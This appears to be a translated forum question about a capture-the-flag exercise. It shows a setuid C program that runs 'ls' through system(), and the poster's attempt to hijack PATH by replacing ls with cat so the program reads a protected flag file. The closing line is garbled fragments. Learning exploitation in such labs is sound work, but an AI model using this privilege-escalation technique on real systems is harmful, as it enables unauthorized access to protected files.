I am trying to solve this problem, I am only allowed to run the ls command, and my goal is to read the flag. There is vulnerable C code that has setuid.
-rwsr-sr-x 1 lameprogrammer lameprogrammer 8579 Sep 15 07:21 vul_c
-rw-r----- 1 lameprogrammer lameprogrammer 154 Sep 15 07:40 flag
I am an attacking user and I have to read this flag file. Given code C
#include <stdlib.h>
#include <stdio.h>
#define FILENAME "/var/challenges/attacker/challenge1/flag"
int main(void)
{
int vert;
vert = system("ls " FILENAME);
if(!vert)
puts("Flag is at " FILENAME " :P ");
else
puts("Sorry! no file is there");
}
I tried to convert ls to cat, so if it starts, it will read the flag file . To do this, I copied the entire bin folder to my local space, and then replaced ls with cat, and then exported a new PATH. Technically, this should replace, and my ls team should work like a cat, but it does not work. The following is my command:
cp -r /bin /home/attacker
cd /home/attacker/bin
rm ls
cp cat ls
export PATH=/home/attacker/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/usr/games
The ls command does not work like cat and output:
ls: unrecognized option '--color=auto'
Try 'ls --help' for more information.
. /vul _c, , , . ! .
.